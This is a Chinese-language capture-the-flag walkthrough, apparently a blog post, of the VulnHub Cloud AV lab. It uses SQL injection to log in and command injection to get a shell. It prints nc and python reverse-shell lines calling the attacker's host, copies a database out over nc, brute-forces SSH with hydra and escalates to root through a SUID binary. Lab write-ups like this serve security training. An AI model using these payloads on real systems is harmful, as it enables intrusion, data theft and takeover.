Bootstrap

VnlnHub BOREDHACKERBLOG CLOUD AV

靶场搭建

靶场下载地址:BoredHackerBlog: Cloud AV ~ VulnHub

下载下来是虚拟机.ova压缩文件,直接用Vmvare导出就行

打开后把网络模式设置为NAT模式(桥接模式也可以,和kali攻击机保持一致就可以)

开启虚拟机

我打靶时这台靶机不能自己获取ip,需要更改一下配置,具体操作请看我这篇文章:靶机无法自己获取ip地址解决办法_奋斗吧!小胖子的博客-CSDN博客

靶场搭建完成

渗透测试

由于不知道靶机ip,所以需要扫描NAT的网段

128是kali攻击机,所以132是靶机

扫描靶机所开放的端口、服务及版本

nmap -sT -p 0-65535 -A 192.168.52.132

开放了22端口,存在SSH服务

开放了8080端口,存在http服务,且存在框架Werkzeug 0.14.1 (python 2.7.15)

先访问一下WEB

发现一个反病毒扫描的一个模块,需要输入密码才能进入

抓包测试

发送到repeater模块

密码错误就会回显WRONG INFORMATION

测试一下是否存在sql注入,发现存在sql注入

使用sql注入语句登录

成功登入

可以看到列出了一些文件,让我们输入文件名来扫描这些文件

推测这个扫描可能是通过在命令行运行某个扫描软件,软件名称 + 文件名

所以可能存在命令注入,测试一下

果然存在命令注入

利用命令注入来获得shell

看看靶机上是否有nc

存在nc

看靶机上是否有python

存在python

这里我们分别用两种方式来获取shell

用nc

在kali上监听4444端口

执行以下命令

bash | nc 192.168.52.128 4444 -e /bin/bash

执行了命令,但是没有收到shell

可能是由于靶机上的nc版本不支持-e参数,这里我们使用nc串联试一下

在kali上分别监听4444和5555两个端口

执行以下命令

bash | nc 192.168.52.128 4444 | /bin/bash | nc 192.168.52.128 5555

成功获得shell,在4444端口输入命令,在5555端口回显

用python

在kali上监听6666端口

执行以下命令

bash | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.52.128",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

成功获得shell

在目录下发现一个database.sql数据库文件,数据库中很有可能包含着很重要的信息

通过file命令查看这个文件,发现这个文件是一个sqllite的文件

执行一下sqllite命令,发现靶机上不存在sqlite的运行环境

我们需要将这个sql文件上传到kali机器上,在kali机器上查看

通过nc来传输文件

在kali上输入以下命令

nc -nlvp 3333 > a.sql

在靶机上输入以下命令

nc 192.168.52.128 3333 < database.sql

传输成功

在kali上执行sqlite,运行sqlite

进入sqlite命令行之后,输入命令

.open a.sql    ## 打开加载sql文件
.database    ## 查看当前运行的数据库
.dump    ## 查看当前数据库数据

成功查看到数据

ERT INTO code VALUES('myinvitecode123');
INSERT INTO code VALUES('mysecondinvitecode');
INSERT INTO code VALUES('cloudavtech');
INSERT INTO code VALUES('mostsecurescanner');

发现了四个密码,并且主机开放了ssh服务,试着登录ssh服务

先看一下有哪些用户

cat /etc/passwd

发现有三个用户有/bin/bash,也就是可以登录的用户

将这三个用户名保存到user.txt文件中

将四个密码保存到passwd.txt文件中

使用hydra进行ssh爆破

hydra -L user.txt -P passwd.txt 192.168.52.132 ssh

没有发现可以登录的账号密码

接下来只能通过已经获得的shell进行提权

sudo提权

sudo -l 查看是否有可提权的命令

需要密码,不能同过这种方式提权

SUID提权

SUID可以让程序调用者以文件拥有者的身份运行该文件,当我们以一个普通用户去运行一个root用户所有的SUID文件,那么运行该文件我们就可以获取到root权限

通过命令

find / -perm -4000 2>/dev/null查看是否具有root权限的命令

常见可用于提权root权限文件

        nmap

        vim

        find

        bash

        more

        less

        nano

        cp

        screen-4.5.0

发现一个有suid权限的一个似乎可以利用的文件

进入到此文件目录下

发现一个文件名相同的.c文件,所以猜测此文件就是由.c文件编译而来的

查看一下这个c语言程序

程序的大概含义是,执行这个文件时,后面要加上参数,如果不带参数的话就会提示你加上参数,如果有参数,就正常执行命令

我们可以试着利用一下,看能不能命令注入

先分别监听4444和5555端口

然后执行一下命令

./update_cloudav "aloudav_app | nc 192.168.52.128 4444 |/bin/bash | nc 192.168.52.128 5555"

成功获得root权限的shell

;